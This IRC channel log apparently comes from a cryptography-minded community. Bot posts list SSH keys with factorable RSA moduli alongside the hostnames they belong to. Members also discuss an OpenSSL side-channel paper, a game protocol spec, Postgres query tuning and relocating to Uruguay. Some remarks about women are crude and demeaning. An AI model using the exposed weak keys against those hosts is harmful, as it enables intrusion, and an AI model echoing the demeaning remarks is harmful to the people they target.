1805063;1524550278;deedbot;http://phuctor.nosuchlabs.com/gpgkey/9F6092D04DEA86B622609E6180D0FFF36C98E3D57800717F50FED9AD00969536 << Recent Phuctorings. - Phuctored: 2528...1771 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (net-2-32-120-51.cust.vodafonedsl.it. IT) 1805064;1524550278;deedbot;http://phuctor.nosuchlabs.com/gpgkey/307677C477804399905E5AF3D10FDAAC1D693D977C2971315430C3D515D02AD7 << Recent Phuctorings. - Phuctored: 2528...1771 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (net-188-152-230-235.cust.vodafonedsl.it. IT PN 36) 1805065;1524550279;deedbot;http://phuctor.nosuchlabs.com/gpgkey/C0CF515C5DD6F8C161BA4EEB4BF67880E659C314CE6D1636DAEE2051FA06E1DB << Recent Phuctorings. - Phuctored: 2528...1771 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (net-188-219-124-191.cust.vodafonedsl.it. IT) 1805066;1524550279;deedbot;http://phuctor.nosuchlabs.com/gpgkey/F55298A1C3D09A29454FE7FD12266177C352EB287DB862598E67E0A5862F77C3 << Recent Phuctorings. - Phuctored: 2528...1771 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (net-37-159-230-10.cust.vodafonedsl.it. IT) 1805067;1524550280;deedbot;http://phuctor.nosuchlabs.com/gpgkey/F35CBC6EB7C37C935C3B04CAA079E408C339E9BE39FAAEB9BA691305ED13CAB5 << Recent Phuctorings. - Phuctored: 2528...1771 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (net-37-159-228-43.cust.vodafonedsl.it. IT) 1805068;1524550280;deedbot;http://phuctor.nosuchlabs.com/gpgkey/F12458CF8CBD33C8E781AAE2A5E6E2FDAF6B2B401FBFC3EE9FEFD478A1E08302 << Recent Phuctorings. - Phuctored: 2528...1771 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (net-93-149-65-124.cust.vodafonedsl.it. IT) 1805069;1524550281;deedbot;http://phuctor.nosuchlabs.com/gpgkey/DE285BB6DA6864D4D63A2B985B7D3D45BB379EDE72E4D291441984785A481A47 << Recent Phuctorings. - Phuctored: 2528...1771 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (net-93-149-65-152.cust.vodafonedsl.it. IT) 1805070;1524550281;deedbot;http://phuctor.nosuchlabs.com/gpgkey/7EF406F6AC1D95CB45ADE772772079F737F9AC01AFE0F207311C0C6E85F0F887 << Recent Phuctorings. - Phuctored: 2528...1771 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (net-93-145-244-92.cust.vodafonedsl.it. IT TO 21) 1805071;1524550282;deedbot;http://phuctor.nosuchlabs.com/gpgkey/EFB379D9FB3A11C3CE30F5C5BE428C528E1E268A00A2B2152347836F306AEF14 << Recent Phuctorings. - Phuctored: 2528...1771 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (net-93-150-63-106.cust.vodafonedsl.it. IT VI 34) 1805072;1524550282;deedbot;http://phuctor.nosuchlabs.com/gpgkey/32FA67BBBEA0328BFAC238817ACE64184351B074A84E96FB04E09B7BD3A6450B << Recent Phuctorings. - Phuctored: 2528...1771 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (net-93-146-198-214.cust.vodafonedsl.it. IT) 1805073;1524565786;spyked;http://btcbase.org/log/2018-04-24#1804959 <-- /me can confirm. I have a toy prototype, irc side is in process of consolidation; rss grabbing and parsing side (the cl-feed-parser thing) is kinda brittle and might have to be replaced. 1805074;1524565786;a111;Logged on 2018-04-24 02:52 trinque understands spyked to be working on a superior rsstron 1805075;1524574087;mircea_popescu;http://btcbase.org/log/2018-04-17#1801153 << what's your eta on this ? (and for that matter http://btcbase.org/log/2018-04-09#1794641 ?) 1805076;1524574087;a111;Logged on 2018-04-17 21:32 phf: http://btcbase.org/log/2018-04-17#1800966 << i'll start reading the spec, i was already planning on writing my own version of client 1805077;1524574087;a111;Logged on 2018-04-09 14:45 mircea_popescu: phf i guess next on your plate is make a prototype proper grapher for all time ? then mod6 can put that in v and avoid further such wtfs. 1805078;1524574171;mircea_popescu;http://btcbase.org/log/2018-04-22#1804435 << you ARE going to invoice me on your own power rather than wait for me to forget, rite ? 1805079;1524574171;a111;Logged on 2018-04-22 10:24 mircea_popescu: ben_vulpes, hey, can i get a shared acct for hosting minigame's files etc ? 1805080;1524580478;mod6;mornin TMSR~ 1805081;1524581051;mircea_popescu;heya mod6 1805082;1524581353;mod6;Looks like we found some keys 'eh! 1805083;1524581880;mod6;How goes BingoBoingo 1805084;1524581882;BingoBoingo;Ah, the Phucking lines in the logs, how I missed them so 1805085;1524581883;lobbesbot;BingoBoingo: Sent 14 hours and 29 minutes ago: http://p.bvulpes.com/pastes/q1izn/?raw=true 1805086;1524581959;BingoBoingo;mod6: Going fairly good. Alf's detarture has served to highlight the comparative inhumanity of the locals, but if alf can survive as long as he did in Mordor, I guess I am going to have to get used to life as a man without a physical country 1805087;1524582299;mod6;Ah. Country is where your heart is, not where your feet are. 1805088;1524582452;*;asciilifeform waves 1805089;1524582461;mod6;hey hey hey, lbj 1805090;1524582511;deedbot;http://qntra.net/2018/04/microsoft-again-introduces-new-vulnerabilities-via-update-this-time-in-a-meltdown-patch/ << Qntra - Microsoft Again Introduces New Vulnerabilities Via Update: This Time In A "Meltdown" Patch 1805091;1524582516;BingoBoingo;ty asciilifeform 1805092;1524582636;asciilifeform;BingoBoingo: isp wire is grinding nao 1805093;1524582640;*;mod6 guzzles down more engine de-greaser 1805094;1524582668;mod6;we got stormy with chance of packeting weather? 1805095;1524582763;asciilifeform;mod6: this'd be the usd for pizarro's rent 1805096;1524582844;BingoBoingo;[Thumbs up: Color - Dark blue gums heart of Africa black] 1805097;1524582868;mod6;oooo, gotcha. 1805098;1524582878;mod6;thanks asciilifeform 1805099;1524582888;asciilifeform;http://btcbase.org/log/2018-04-24#1805086 << once we get to troo +ev -- and iirc asciilifeform discussed this with BingoBoingo in BingoBoingostan -- oughta get a proper conspiratorial flat there, and then we can rotate ( say asciilifeform does a shift, BingoBoingo goes on shore leave ) 1805100;1524582888;a111;Logged on 2018-04-24 14:59 BingoBoingo: mod6: Going fairly good. Alf's detarture has served to highlight the comparative inhumanity of the locals, but if alf can survive as long as he did in Mordor, I guess I am going to have to get used to life as a man without a physical country 1805101;1524582936;mod6;I think he and I touched on this once, but remarked about how expensive it is... but I'm sure something could be arragned, ya. 1805102;1524582954;asciilifeform;mod6: seems like his bed + 'cowork' is already ~80% of the cost of actual flat 1805103;1524582985;mod6;ah. then we're not too far away from a real place to hang his hatt. 1805104;1524583000;asciilifeform;and right nao he can't even decamp to , say, buenos aires for a few days, without losing his berth 1805105;1524583006;mod6;we just gotta stay on our grind, keep things going, good things will happen. 1805106;1524583027;BingoBoingo;mod6: In US-istani terms it isn't too expensive, but on current shoestring budget upfront costs of a flat are prohibitive 1805107;1524583050;mod6;no shit huh? they won't even hold his spot at the hostel, even if he's paying in advance? 1805108;1524583074;BingoBoingo;mod6: They will hold it, but... 1805109;1524583106;*;asciilifeform reads over the initial burst of phuctorola 1805110;1524583117;mod6;Some mangy cocksucker will come in and shit cockroaches onto your bed? 1805111;1524583119;asciilifeform;it's all duped mods ( mostly 1 ) 1805112;1524583122;BingoBoingo;Habits die quickly. I might lose my hard won spot on the balcony where I can enjoy a gringo bubble in the evenings 1805113;1524583154;mod6;Ah. That kinda bites. So they reserve you "a spot", but not "the choice spot". 1805114;1524583207;BingoBoingo;mod6: It is an accomodation open to the public. If I am not there actively enforcing the norms of civilization they will be swiftly forgotten or a german will try to overwrite them with pantsuit. 1805115;1524583220;asciilifeform;lol there are germans?! 1805116;1524583237;mod6;Christ on a cracker. 1805117;1524583243;BingoBoingo;asciilifeform: More germans pass through than Estadounidense 1805118;1524583250;mircea_popescu;asciilifeform, incidentally, do you see it as a mid term you use pizarro as your springboard to move in uy, releasing BingoBoingo into my hand for further adventures ? 1805119;1524583265;asciilifeform;mircea_popescu: possibly 1805120;1524583271;mircea_popescu;seems the ideal course here. 1805121;1524583334;asciilifeform;BingoBoingo is a very formidable advance-guard scout 1805122;1524583342;asciilifeform;could go to, e.g., kazahstan, next... 1805123;1524583360;mircea_popescu;i was mildly thinking cinematic production company, actually. 1805124;1524583362;mod6;I was thinking this might just be the first location; and TMSR may need to claim more land for her colonies. 1805125;1524583364;mircea_popescu;show sorrentino how it's done. 1805126;1524583395;mod6;So maybe yea, some other place, setup shop, next, etc 1805127;1524583407;asciilifeform;mod6: i'll admit to also wishing for moar colonies, but also we are yet far from +ev... 1805128;1524583416;mircea_popescu;the question is, how long are YOU going to sit tied to the snows of central mid center mod6 1805129;1524583427;mod6;For sure. I'm thinking 'mid-term' (aka 3-5yrs) 1805130;1524583443;mircea_popescu;asciilifeform, shared sales are what make or break you this year. there's large margin there. 1805131;1524583469;mod6;I've been trying to figure out how to gtfo for some time now. And I'm not sure. Could be a few years yet. 1805132;1524583496;mod6;We'll see. .uy is looking pretty good. 1805133;1524583540;mod6;Anyway, I think about it every day, pretty much. 1805134;1524583543;asciilifeform;the 1 item i didn't like, is the air pollution 1805135;1524583549;BingoBoingo;Uruguay the country continues growing on me as a base of operations. Uruguayos the people however suck. 1805136;1524583554;mircea_popescu;asciilifeform, lots and LOTS of german cuckbois do the whole travel bit with some woman they picked off the whatever-website-for-travelingcuckbois whom they'll respect very much etc. 1805137;1524583565;mircea_popescu;you should see the panic when i send girl to swoop her. 1805138;1524583597;mircea_popescu;asciilifeform, oh and you should see bogota polution. holy hell, SMOG. like 1980s chicago or LA! 1805139;1524583614;mod6;So here's a practical question that I struggle with... how am I going to get all of my gear to $country? 1805140;1524583619;asciilifeform;mircea_popescu: montevideo was just about soviet-level of exhaust gas 1805141;1524583635;asciilifeform;perhaps edging into chinese level, but asciilifeform has not personally smelled the chinese one 1805142;1524583635;BingoBoingo; So here's a practical question that I struggle with... how am I going to get all of my gear to $country? << Container, slowboat 1805143;1524583642;mod6;Shipping container? Or will that just end up in long term holding until i pay $ransom. 1805144;1524583654;mircea_popescu;mod6, traditionally, you rent a container. 1805145;1524583664;mod6;Alright. Cool. 1805146;1524583666;asciilifeform;mircea_popescu: i suspect he's asking re the customs racket 1805147;1524583672;mircea_popescu;and obviously have a customs agent ready to release it for you. 1805148;1524583688;mod6;*nod* 1805149;1524583698;mircea_popescu;asciilifeform, traditionally custom bills tend to average to about 50% of the shipping costs, in my experience / ppl i know about 1805150;1524583707;mircea_popescu;because no, shipping containers are not free. 1805151;1524583708;BingoBoingo;mod6: Depends. Uruagay has a process tied to Residency application which lets you bring one for customs free as long as it is your "household" 1805152;1524583732;mod6;I see. 1805153;1524583777;mircea_popescu;anyway, for 50k or thereabouts worth of used goods you can expect to pay a few thousand to ship and maybe a grand or two in tax. something like that. 1805154;1524583785;mod6;When I make the trip down (hopefully sometime this year yet), we'll have to discuss what you've learned. 1805155;1524583795;BingoBoingo;Unlike the rest of the residency process mod6, if had with what to fill a container I would retain a profession for it. 1805156;1524583797;mircea_popescu;obviously won't apply to your collection of priceless ming vases and so on. 1805157;1524583804;asciilifeform;the observations from asciilifeform's voyage suggest that the UY customs folx don't actually give a shit about anything that doesn't look like it is new and sellable 1805158;1524583811;mod6;mircea_popescu: makes sense. 1805159;1524583815;asciilifeform;( they did not give half a fuck re the 1u's, for instance ) 1805160;1524583818;mircea_popescu;asciilifeform, that's generally how customs work. 1805161;1524583838;mircea_popescu;they're there to prevent trade, not specifically hinder migration. 1805162;1524583841;asciilifeform;frog vision, so to speak. the only item i even had to defend at all were... the rockchippen 1805163;1524583848;BingoBoingo;asciilifeform: It's all about context. Attended back accentric vacationer. Unattended bag SMUGGLER!!! 1805164;1524583861;mircea_popescu;BingoBoingo, they have a point, at that. 1805165;1524583930;deedbot;http://trilema.com/2018/trilema-gender-studies/ << Trilema - Trilema Gender Studies 1805166;1524583943;BingoBoingo;And there's always gotta be some sort of invoice looking paper, lest they herd you to the local Notary specialization with invoice making powers. 1805167;1524584148;BingoBoingo;Anyways, I'd like to try sticking with Uruguay for at least a passportable length of time. Gotta move past the black mark of KYC 1805168;1524584170;mod6;i first read that as "KFC" 1805169;1524584188;asciilifeform;why are douchebag's sybils still here ? 1805170;1524584195;BingoBoingo;Nah, KFC is in Buenos Aires. Here they don't have pollo frito 1805171;1524584207;mircea_popescu;!!up elevatedgal 1805172;1524584207;deedbot;elevatedgal voiced for 30 minutes. 1805173;1524584209;mircea_popescu;!!up sandi3 1805174;1524584209;deedbot;sandi3 voiced for 30 minutes. 1805175;1524584212;mircea_popescu;!!up missmoon 1805176;1524584212;deedbot;missmoon voiced for 30 minutes. 1805177;1524584215;mircea_popescu;!!up lilmzthang 1805178;1524584215;deedbot;lilmzthang voiced for 30 minutes. 1805179;1524584862;BingoBoingo;http://btcbase.org/log/2018-04-23#1804895 << In other RTFM news, finally read the manual for the weather resistant point and shoot I have been playing with here. Will try some Urban safaris this week. 1805180;1524584862;a111;Logged on 2018-04-23 21:58 asciilifeform: book-larnin'(tm)(r) 1805181;1524585815;asciilifeform;in other lullies, https://eprint.iacr.org/2018/367 >> 'Most of OpenSSL's constant-time code paths are driven by cryptosystem implementations enabling a dedicated flag at runtime. This process is perilous, with several examples emerging in the past few years of the flag either not being set or software defects directly mishandling the flag...' 'granularity issues due to word-size operands to the GCD function' etc 1805182;1524586046;mircea_popescu;heh 1805183;1524586325;asciilifeform;https://archive.li/9LwC2 << plain txt of some of it 1805184;1524586349;asciilifeform;'BN_gcd gets called to check that _e_ and _p-1_ are relatively prime. This function is not constant time, and leaks critical GCD state leading to information on _p_.' and a few moar. 1805185;1524586373;asciilifeform;the funny bit is that this was quite obvious from the proggy, unreadable otherwise as it is, and plentifully discussed, incl. here 1805186;1524586468;mircea_popescu;indeed. 1805187;1524586542;asciilifeform;i find it hilarious how they carry on pretending that a crypto lib where ~some~ of the functions are (supposedly..) constant-time, is worth half a shit 1805188;1524587167;mircea_popescu;hey, it gets the man-alone derps confused enough. 1805189;1524587179;asciilifeform;what's 'man alone' 1805190;1524587240;mircea_popescu;inspired by http://btcbase.org/log/2018-04-16#1800094 / http://btcbase.org/log/2018-04-22#1804522 1805191;1524587240;a111;Logged on 2018-04-16 16:19 mircea_popescu: man acting alone is stuck with these "oh, a conclave of idiots bent on self preservation and avoiding the lowly station their idiocy warrants them holds all the power, and i'll act as man alone confronted by governemnt". 1805192;1524587240;a111;Logged on 2018-04-22 17:52 mircea_popescu: meanwhile it's become a fixation in the children ; now merge it with the church of self esteem and its holy youcandoanything, and the REASON http://btcbase.org/log/2018-04-16#1800094 ie "smart kids" always being found with their pants down acting the "man alone" part and never learning anything from the experience is pretty fucking clear. 1805193;1524587246;asciilifeform;aaaaa 1805194;1524587261;mircea_popescu;basically, people whose heads work have the "choice" such as it is : republic, or man-alone. 1805195;1524587294;asciilifeform;'один в поле не воин'(tm)(r)(folk whizzdom) 1805196;1524587358;danielpbarron;https://youtu.be/dht_3NziwSw << a man alone 1805197;1524587372;asciilifeform;aaha 1805198;1524587386;asciilifeform;works well in movie only. 1805199;1524587761;mircea_popescu;heh 1805200;1524590332;mircea_popescu;anyway, maybe not the best word for it. but the idea is that the wotless individual finds himself very vulnerable strategically : the enemy doesn't need to make sense, just needs to make LONG enough strings of nonsense. 1805201;1524590370;mircea_popescu;and evidently the empire of idiots is aware of this, hence the spaghetti bowl of just-so lenthy strands of nonsense composing "contemporary culture" ie pantsuit nonsense. 1805202;1524593008;*;asciilifeform meanwhile moved phuctor's werker to ramdisk. worx great. 1805203;1524593035;asciilifeform;peaks at 48 GB, with the current set 1805204;1524593163;asciilifeform;reason for this is actually to save wear on ssd; the speedup is mere bonus. 1805205;1524593203;asciilifeform;( if anybody has a similar problem, and wants to know how to properly tune ramdisk -- write in ) 1805206;1524593227;asciilifeform;and incidentally diana_coman if you still need a kernel config with iptables etc support -- also ping me 1805207;1524593786;asciilifeform;BingoBoingo: wire went out 1805208;1524593798;BingoBoingo;asciilifeform: Cool 1805209;1524594156;mod6;*thumbsup* 1805210;1524594200;deedbot;http://qntra.net/2018/04/us-supreme-court-waffles-in-face-of-patent-mess/ << Qntra - US Supreme Court Waffles In Face Of Patent Mess 1805211;1524594405;mircea_popescu;BingoBoingo, "without involving" 1805212;1524594457;mircea_popescu;and big surprise usg.ethereum-court hardforks itself 1805213;1524594607;BingoBoingo;mircea_popescu: ty fxd 1805214;1524594912;ben_vulpes;!!v E76CC2E9B382592EC1E2B6548CAABA71D92CC9E3B39954570E8DF64772D60138 1805215;1524594915;deedbot;Invoiced mircea_popescu .0336 << shared hosting for s.mg april 24 2018 through april 30 2019 1805216;1524595170;diana_coman;asciilifeform, thanks; that kernel recompile I did was precisely for getting support for iptables so it's all set now. 1805217;1524595180;asciilifeform;aa ok 1805218;1524595776;phf;http://btcbase.org/log/2018-04-24#1805075 << i did a first pass on the spec over the weekend, but haven't had time to formulate my thoughts. it looks like enough to do a prototype short of three things: handshake process is still work in progress, i noticed that it's missing type of data descriptor values for 4.3.2 (there's a list of data types, but not the values that indicate which type it is), and there's no format description for the encapsulated f 1805219;1524595776;a111;Logged on 2018-04-24 12:48 mircea_popescu: http://btcbase.org/log/2018-04-17#1801153 << what's your eta on this ? (and for that matter http://btcbase.org/log/2018-04-09#1794641 ?) 1805220;1524595777;phf;ile types. for text client i will need the format of the map files, i suspect it's whatever crystal space is using, but some formalization is required there. 1805221;1524596437;phf;it is otherwise a typical gaming protocol, a single header that wraps a range of message types. i don't quite remember but i think existing eulora protocol works somewhat like that, just a smaller number of message types. 1805222;1524597215;phf;there's also parts in the spec that describe the format, and you can infer the behavior from the format, but there isn't explicit description of behavior. for example movement type a.5.23-a.5.28 is presumably for moving things and self around, but without further details it's hard to say how it's supposed to work. so i can't really say much about the internal consistency of the protocol, i.e. are the message types sufficient to perform some set of in g 1805223;1524597215;phf;ame actions. 1805224;1524597465;phf;well, i'm still going to post a comment about it though on diana_coman's blog, this is more or less thoughts out loud. 1805225;1524597942;diana_coman;http://btcbase.org/log/2018-04-24#1805221 -> o.O ; how did you count those phf ? 1805226;1524597942;a111;Logged on 2018-04-24 19:00 phf: it is otherwise a typical gaming protocol, a single header that wraps a range of message types. i don't quite remember but i think existing eulora protocol works somewhat like that, just a smaller number of message types. 1805227;1524598002;phf;diana_coman: i meant to say that your protocol has less message types 1805228;1524598021;diana_coman;ah, lol 1805229;1524598104;phf;diana_coman: is the protocol the entirety of documentation for client writers or there's more stuff in the pipeline? 1805230;1524598184;diana_coman;phf, atm it's rfc anyway so if there is something specific you require from client-writer perspective, ask for it at any rate 1805231;1524598201;phf;kk 1805232;1524598312;diana_coman;also comment/critique away at it; I'm especially interested to hear if you see any problems with its current structure/missing parts/unclear parts/anything 1805233;1524598497;*;phf nods 1805234;1524607678;deedbot;http://www.loper-os.org/?p=2295 << Loper OS - A Clean Gentoo for Rockchip. 1805235;1524607741;asciilifeform;!!later tell mats http://logs.bvulpes.com/pizarro?d=2018-4-21#342015 <<<< >>>> http://www.loper-os.org/?p=2295 1805236;1524607741;mimisbrunnr;Logged on 2018-04-21 19:06 mats: can i get an invoice for 1 q of rockchip service, a tar of the image, and build instructions for that image? 1805237;1524607745;asciilifeform;grr 1805238;1524607761;asciilifeform;!Q later tell mats http://logs.bvulpes.com/pizarro?d=2018-4-21#342015 <<<< >>>> http://www.loper-os.org/?p=2295 1805239;1524607762;mimisbrunnr;Logged on 2018-04-21 19:06 mats: can i get an invoice for 1 q of rockchip service, a tar of the image, and build instructions for that image? 1805240;1524607762;lobbesbot;asciilifeform: The operation succeeded. 1805241;1524609919;ben_vulpes;!!v DB96B2FC2B8E62897B4F6D714B32DAFB07798ADA8A3E17D79C6B48B7EABC1EF6 1805242;1524609922;deedbot;Invoiced mats .02582892 << rockchip hosting april 25th 2018 through july 30th 2018 1805243;1524612728;asciilifeform;oh hey hey 1805244;1524612749;asciilifeform;loox like... half of the pilot plant, is occupied nao 1805245;1524613267;asciilifeform;mircea_popescu, diana_coman , et al, other folx who travel -- i'd like to get a picture of whether there is 'market' in l1/l2 for a pre-engentooated ( laugh at the laddel-ism, but it promises to be a somewhat painful process involving crocodile and eeprom writer ) 'c101pa' rockchip lappy . 1805246;1524613276;asciilifeform;!#s c101pa 1805247;1524613277;a111;7 results for "c101pa", http://btcbase.org/log-search?q=c101pa 1805248;1524613349;asciilifeform;( ^ see also. tldr -- vendor sells these as a kind of nintendo, https://archive.li/zTEkd , with google crapola on the flash ) 1805249;1524613398;BingoBoingo;Is the eMMC on these guys soldered or is it swappable? 1805250;1524613403;asciilifeform;soldered 1805251;1524613409;asciilifeform;there's a u-sd socket tho. 1805252;1524613434;asciilifeform;really only interesting from a 'almost cheap enuff to throw away' in-print comp pov 1805253;1524613476;asciilifeform;well, that and the (theoretical) possibility of 100% turdless operation. 1805254;1524613499;asciilifeform;in principle, the gentoo i posted earlier, oughta boot on these. 1805255;1524613539;asciilifeform;would need a few additional massages for video card and nic. but otherwise ready to eat. 1805256;1524613578;asciilifeform;iirc same vendor also sells a slightly larger comp, a 'c201pa' iirc. 1805257;1524613719;mod6;evenin' 1805258;1524614242;deedbot;http://phuctor.nosuchlabs.com/gpgkey/DC19102B1A63427180A03BF97D0EB40841CA948071A310324477E3D84E3C239D << Recent Phuctorings. - Phuctored: 1460...7153 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (host-244.wlan-38.dobruska.cz. CZ 524 KR) 1805259;1524614804;mircea_popescu;http://btcbase.org/log/2018-04-24#1805229 << yes, the idea is to develop that one item into the complete story for client writers. 1805260;1524614804;a111;Logged on 2018-04-24 19:28 phf: diana_coman: is the protocol the entirety of documentation for client writers or there's more stuff in the pipeline? 1805261;1524614813;mircea_popescu;so be as minutious as you'd like. 1805262;1524614880;mircea_popescu;http://btcbase.org/log/2018-04-24#1805245 << if it's something i can gift to newbies and it'll allow them to gpg ; and not very expensive ; probably. 1805263;1524614880;a111;Logged on 2018-04-24 23:41 asciilifeform: mircea_popescu, diana_coman , et al, other folx who travel -- i'd like to get a picture of whether there is 'market' in l1/l2 for a pre-engentooated ( laugh at the laddel-ism, but it promises to be a somewhat painful process involving crocodile and eeprom writer ) 'c101pa' rockchip lappy . 1805264;1524614895;asciilifeform;mircea_popescu: it's starvation-cheap. sorta the appeal. 1 to 2 hundy usd 1805265;1524614917;asciilifeform;and made in , seems, gigantic numbers 1805266;1524614933;asciilifeform;( i saw'em at civilian electronics stores over here ) 1805267;1524614934;mircea_popescu;i'd buy some, give the visiting sluts. sorta like the titbits thing. 1805268;1524614945;asciilifeform;better gift than crapple, verily 1805269;1524615014;asciilifeform;thing has all of the (few) virtues of the crapple (e.g. 9 hrs on battery, 16 days of suspend , charge from usb ) , and , in principle, none of the barfology 1805270;1524615028;mircea_popescu;atm i'm not really doing that ; but for more respectable cut of girlmeat there's ye olde ibms. 1805271;1524615060;asciilifeform;theoretically has moar horse than asciilifeform's beloved x60 , even 1805272;1524615077;asciilifeform;( picture, 6-core arm64 ) 1805273;1524615245;mircea_popescu;basically acquisition order would switch from "send plane ticket" to "send plane ticket + gpgstation". 1805274;1524615257;asciilifeform;there is afaik no adult rng on board ( in what, exactly, is there one ? ) but it has usb socket for FG; and the typical shit webcam for gurl-powered rng in principle. 1805275;1524615273;asciilifeform;( webcam built into lid ) 1805276;1524615289;mircea_popescu;the plane ticker fuzz factor is 1-200 anyways. 1805277;1524615294;mircea_popescu;ticket* 1805278;1524615740;asciilifeform;mircea_popescu: does eulora run on arm64 ? ( or, perhaps better q, does it contain any gnarly x86-specific asm ) 1805279;1524615781;mircea_popescu;you mean the client ? 1805280;1524615784;asciilifeform;aha 1805281;1524615807;asciilifeform;( not suggesting to put ~server~ on arm, lol ) 1805282;1524615872;mircea_popescu;it can use w/e the fuck you want it to use. 1805283;1524615890;mircea_popescu;extant item slated for replacement anyways, hence all the protocol talk. 1805284;1524615924;asciilifeform;in principle you could, then, put even eulora, on the c101. 1805285;1524615936;asciilifeform;( believe or not, thing seems to contain some sort of 3d gpu ) 1805286;1524615976;asciilifeform;painfully small display, tho, at least for grown man's eyes 1805287;1524616392;BingoBoingo;Anything over 10 pulgadas is fine 1805288;1524618204;mircea_popescu;BingoBoingo, amusingly, no further than today walking through town i was explaining to girl the source and meaning of pulgada 1805289;1524618245;mircea_popescu;(as "that length of knife blade that hurts but doesn't seriously injure, obtained by holding the instrument a certain way so the thumb covers the blade". PRISON SLANG!) 1805290;1524618286;BingoBoingo;Ah 1805291;1524618555;*;BingoBoingo wonders what gabriel_laddel is up to, and how the foot is. 1805292;1524618602;asciilifeform;hey trinque -- or other serious sqlist -- around ? 1805293;1524618620;asciilifeform;i have a puzzler. 1805294;1524618703;asciilifeform;i have a proggy which wants to select * from moduli where idx not in (select distinct unnest(mods) from factors) ; but this runs in geological time. for no afaik good reason. 1805295;1524618769;asciilifeform;is it possible to rewrite this so that postgres doesn't do the retarded thing that it evidently does ( this being, to compute the mods in the () , again and again FOR EVERY ROW in moduli ) 1805296;1524618806;asciilifeform;blew hours on this, with no result. 1805297;1524618840;asciilifeform;( all i want above, is to produce a select of all unphuctored moduli. ) 1805298;1524618921;asciilifeform;for completeness of picture, 'mods' is a column in factors, which contains indices of moduli (in 'moduli' table) that said factor is a factor of. 1805299;1524618922;phf;with tmp as (select distinct unnest(mods) from factors) select * from moduli where idx not in tmp; 1805300;1524618936;*;asciilifeform goes to try this.. 1805301;1524618965;asciilifeform;eggog 1805302;1524618977;asciilifeform;ERROR: syntax error at or near "tmp" 1805303;1524618991;asciilifeform;LINE 1: ...ds) from factors) select * from moduli where idx not in tmp; 1805304;1524618997;asciilifeform;i suspect this dunwork on postgres ? 1805305;1524619058;phf;oh i suppose with tmp as (select distinct unnest(mods) as mods from factors) select * from moduli where idx not in (select mods from tmp); 1805306;1524619101;mircea_popescu;asciilifeform, temp table neh. 1805307;1524619112;asciilifeform;phf: looks like STILL geological 1805308;1524619134;phf;hmm, poop 1805309;1524619150;mircea_popescu;asciilifeform, build the actual table and do a join then. 1805310;1524619154;asciilifeform;lit suggests that 'not in' operation in postgres is pathologically slow 1805311;1524619168;asciilifeform;mircea_popescu: ludicrously slow 1805312;1524619174;asciilifeform;needs to run in-place. 1805313;1524619211;mircea_popescu;you will soon discover your heavily recursive way of thinking is deeply inadequate for the strengths and useful work of a db ; which may explain why you've not been looking into them to this advanced age. 1805314;1524619227;asciilifeform;mircea_popescu: actually 'looked in' plenty, and always run into this nonsense 1805315;1524619257;asciilifeform;i.e. idiocy that is not in any way implicit in the mathematical structure of the underlying primitives (e.g. btree) but comes from agglomeration of programmers dropped as children 1805316;1524619266;asciilifeform;implementing sqltrons 1805317;1524619274;mircea_popescu;incidentally, the inept way in which postgress handles this case is why mysql still official db for mp-wp 1805318;1524619318;asciilifeform;mircea_popescu: does 'in ...' run at same speed as 'not in ...' in mysql ? 1805319;1524619325;mircea_popescu;just about. 1805320;1524619328;asciilifeform;nifty. 1805321;1524619336;mircea_popescu;now to be clear, it has other issues. 1805322;1524619341;asciilifeform;sadly my whole orchestra is firmly cemented into postgres.. 1805323;1524619358;asciilifeform;( and if it were to finally rewrite it, i'd ditch sqlism forever and entirely, like a bad dream ) 1805324;1524619366;mircea_popescu;which is why i never proposed you move. 1805325;1524619379;asciilifeform;phf your query's been running since you gave it to me, but produced sadly 0 output 1805326;1524619382;mircea_popescu;but anyway. if your proggy includes a db you will have to ~DESIGN~ for the db. 1805327;1524619391;phf;hah 1805328;1524619417;asciilifeform;mircea_popescu: right, it is designed for ( what i know of ) the db, and thereby lacks many knobs that i'd dearly like to have 1805329;1524619438;mircea_popescu;well evidently not enough, unroll the not-in thing. 1805330;1524619450;asciilifeform;how wouldja unroll this ? 1805331;1524619456;asciilifeform;this was the q to begin with 1805332;1524619484;asciilifeform;so far errything i tried, gives same result ( query that promises to run in months, rather than the allotted ~halfhr) 1805333;1524619492;phf;asciilifeform: other option is to do a left outer join, and then filter by nulls, but i'm trying to recreate the exercise at home so that we're not doing tedious roundtrip through irc 1805334;1524619495;trinque;except operator might be faster than "not in" 1805335;1524619534;mircea_popescu;phf, it's what i suggested, he said it's just as slow 1805336;1524619539;mircea_popescu;(andf said it too fast to have tried it) 1805337;1524619581;asciilifeform;trinque, mircea_popescu : how would this look in the given item ? 1805338;1524619591;*;asciilifeform rereads log, possibly missed sumthing 1805339;1524619646;asciilifeform;mircea_popescu: i thought your algo involved a temporary table 1805340;1524619651;asciilifeform;( 'build the table and do join' ) 1805341;1524619667;mircea_popescu;no, that was his previous 